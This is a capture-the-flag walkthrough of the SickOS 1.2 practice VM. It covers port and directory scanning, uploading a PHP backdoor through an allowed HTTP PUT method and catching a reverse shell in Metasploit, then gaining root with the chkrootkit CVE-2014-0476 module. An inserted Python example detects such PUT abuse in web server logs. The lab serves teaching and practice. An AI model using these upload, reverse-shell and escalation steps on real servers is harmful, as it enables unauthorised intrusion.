Information Security

SickOS 1.2 Walkthrough


SickOS 1.2
This machine can be downloaded from:
Set the Network adapter to NAT if you are using VMware.
Find the target's local IP with the netdiscover command:
It may be different in your lab.
Scan the target IP with nmap as a default scan:
    nmap -A -vv -T4
We detect that two ports are open: 22/tcp and 80/tcp.
Scan all TCP ports; for faster usage we can use zenmap:
  • Type zenmap to open zenmap tool
  • Type the IP in target:
  • Choose from profile: Intense scan, all TCP ports
As shown in the screenshot:
    nmap -p 1-65535 -T4 -A -v
Scan all UDP ports:
  • Type the IP in target:
  • Choose from profile: Intense scan plus UDP
We didn’t find useful ports in the UDP scan, so we go back to the TCP scan.
Since we determined that the target has port 80 open, we browse to it.
We run nikto -h to scan the web server and detect directories on that host:
    nikto -h
Since there is no useful result, we run dirbuster with the medium wordlist to find directories with a different tool:
  • Type the target in the text field.
  • Check Go Faster to speed up the process.
  • Choose the wordlist in /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
  • Click Start
Then we detect a “test” directory; let’s open it in the browser.
Let’s analyze the page and view its source: nothing useful.
So we can analyze the server side either via burpsuite or via the curl command, using OPTIONS to determine which HTTP methods are allowed:
#curl -v -X OPTIONS
After we detect that the PUT method is allowed, we can put our shell either via burpsuite or via Nmap.
Let us generate the shell first.
I use a ready-made shell that is in Kali by default, found using:
    locate shell
Copy the shell and rename it as shell.php:
    cp /usr/share/webshells/php/php-backdoor.php /root/shell.php
Edit shell.php via the command:
    nano shell.php
    >> kali IP
$port 443 
    >> because 4444 isn’t working
    nmap -p 80 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'
Successfully created!
Now we have to set up a listener, which can be done in two different ways: nc -lvp 443 or metasploit, but I prefer metasploit for privilege escalation later.
We use the payload php/reverse_php because we generated a shell, not meterpreter, and that works for me.
Set the local host (Kali IP) and port (443) as we did in the shell previously.
Then we type exploit (-jz) to run the session in the background.
    use exploit/multi/handler
    set payload php/reverse_php
    set LHOST 192.168.236.136
    set LPORT 443
    exploit -jz
Final options:
Then we open this shell via the browser:
Finally we got a user shell!
But only as the normal user www-data.
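From the defender's side, the sequence used above (OPTIONS probe, successful PUT of a script into the directory, then a request for that script) leaves a clear trail in the web server's access log. The following detection check is an added example, not part of the original walkthrough; the Common Log Format, the sample lines, the IP addresses and the function name `find_put_abuse` are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access log (Common Log Format); IPs and timestamps are illustrative.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Apr/2016:10:01:02 +0000] "GET /test/ HTTP/1.1" 200 512
192.0.2.10 - - [12/Apr/2016:10:01:40 +0000] "OPTIONS /test/ HTTP/1.1" 200 0
192.0.2.10 - - [12/Apr/2016:10:02:15 +0000] "PUT /test/shell.php HTTP/1.1" 201 0
198.51.100.7 - - [12/Apr/2016:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 163
192.0.2.10 - - [12/Apr/2016:10:03:05 +0000] "GET /test/shell.php HTTP/1.1" 200 0
198.51.100.7 - - [12/Apr/2016:10:04:00 +0000] "PUT /test/notes.txt HTTP/1.1" 403 345
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions a web server may execute rather than serve as static content.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx", ".cgi", ".pl")

def find_put_abuse(log_text):
    """Flag successful PUT uploads of script files and any later requests for them."""
    probed = defaultdict(set)   # client IP -> directories it probed with OPTIONS
    uploaded = {}               # uploaded script path -> its finding
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not in the expected format
        ip, method, status = m["ip"], m["method"], int(m["status"])
        path = m["path"].split("?", 1)[0]
        directory = path.rsplit("/", 1)[0] + "/"
        if method == "OPTIONS":
            probed[ip].add(directory)
        elif method == "PUT" and 200 <= status < 300 and path.lower().endswith(SCRIPT_EXT):
            finding = {"path": path, "uploader": ip,
                       "probed_first": directory in probed[ip], "executed_by": []}
            uploaded[path] = finding
            findings.append(finding)
        elif method in ("GET", "POST") and path in uploaded and status < 400:
            uploaded[path]["executed_by"].append(ip)  # uploaded script was requested
    return findings

if __name__ == "__main__":
    for finding in find_put_abuse(SAMPLE_LOG):
        print(finding)
```

A finding with a non-empty `executed_by` list means the uploaded file was also requested afterwards; the lasting fix is to disable PUT on the directory rather than rely on log review.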
For privilege escalation, we first check what is currently running with root privileges:
    ls -la
We saw the line showing that chkrootkit has root privileges:
    drwxr-xr-x  2 john john  4096 Apr 12  2016 chkrootkit-0.49
After searching Google for a vulnerability, we discovered
the chkrootkit vulnerability CVE-2014-0476, which could allow me to escalate my privileges
with a metasploit module:
  • use exploit/unix/local/chkrootkit
  • set session 1
Enter the commands above to load the exploit/unix/local/chkrootkit module, then set session 1 and an arbitrary lport such as 8080, and run the module.
For me, I set session 3 because I had already opened sessions 1 and 2.
Check lport with the options command:
Then type run.
Session 4 opened, in my case.
Type id to see the account's privileges.
Now we are root!
Open 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt for the final flag:
    cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
I hope you enjoy it!
Contact me on Twitter: